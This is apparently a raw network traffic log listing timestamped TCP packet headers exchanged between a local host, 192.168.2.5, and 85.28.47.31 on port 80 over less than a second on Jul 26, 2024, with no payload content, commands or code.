Jul 26, 2024 17:56:14.628318071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.628329992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628340006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628350973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628361940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628427029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.628524065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628534079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628545046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628555059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628566027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628576040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.628577948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628588915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628599882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628609896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.628611088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628642082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.628668070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.628673077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628701925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628710032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.628741980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.628766060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628776073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628786087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628808975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.628835917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.628916979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628926992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628937960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628950119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628959894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628962994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.628971100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628983021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628994942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629009008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629029036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629173040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629183054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629194021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629204988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629215002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629225016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629225016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629237890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629249096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629255056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629260063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629275084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629292965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629450083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629460096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629471064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629482031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629492044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629492998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629503012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629511118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629513979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629524946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629535913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629540920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629545927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629556894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629573107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629590988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629717112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629728079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629736900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629759073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629776001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629904985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629915953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629925966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629936934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629946947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629951000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629956961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629968882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629980087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629981041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.629991055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.629996061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630002022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630012035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630022049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630023003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630032063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630043030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630058050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630059004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630070925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630100012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630245924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630290031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630451918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630462885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630474091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630484104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630495071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630501986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630506992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630517960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630528927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630530119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630538940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630548000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630549908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630559921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630565882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630588055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630597115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630599022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630608082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630619049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630628109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630629063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630640984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630644083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630650997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630664110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630671978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630675077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630686998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630697966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630702019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630707979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630718946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630718946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630728960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630738020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630739927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630750895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.630769014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.630799055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.631351948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.631362915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.631373882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.631382942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.631400108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.631414890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.735213041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735263109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735291004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.735310078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735316038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.735320091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735352993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.735384941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735395908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735407114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735424042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.735454082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.735549927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735560894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735570908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735582113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735591888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.735591888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735603094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735618114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.735639095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.735744953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735754967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735776901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735789061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.735814095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.735948086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.735991001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736005068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736015081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736043930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736056089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736066103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736076117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736094952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736109972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736242056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736253023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736263990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736274958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736284018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736285925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736296892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736314058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736335039 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736512899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736527920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736538887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736548901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736552000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736560106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736571074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736581087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736581087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736592054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736603022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736613035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736613989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736629963 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736649036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736790895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736829996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736886024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736896038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736907005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736917973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736922026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736928940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736939907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.736939907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.736974001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.737318039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.737328053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.737339020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.737348080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.737358093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.737359047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.737369061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.737374067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.737377882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.737402916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.737406015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.737416029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.737425089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.737433910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.737435102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.737446070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.737462044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.737492085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.782624960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.787640095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978411913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978431940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978442907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978485107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.978504896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.978517056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978528023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978538990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978553057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978558064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.978579044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.978605986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.978616953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978652954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.978712082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978723049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978734016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978744030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978750944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.978754997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978766918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.978784084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.978810072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.978988886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979006052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979017019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979027987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979031086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979038954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979049921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979058027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979059935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979070902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979083061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979094028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979096889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979104996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979113102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979119062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979130983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979135036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979140997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979152918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979166985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979192019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979338884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979350090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979361057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979372025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979384899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979407072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979453087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979464054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979475021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979486942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979491949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979499102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979510069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979521036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979523897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979532957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979553938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979572058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979731083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979741096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979752064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979768991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979789019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979846001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979856968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979866982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979881048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979887962 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979891062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979902983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979909897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979913950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979927063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.979942083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.979973078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980091095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980101109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980110884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980120897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980134010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980164051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980185986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980199099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980210066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980221987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980223894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980232954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980245113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980253935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980256081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980267048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.980283976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980304956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.980469942 CEST	80	49704	85.28.47.31	192.168.2.5
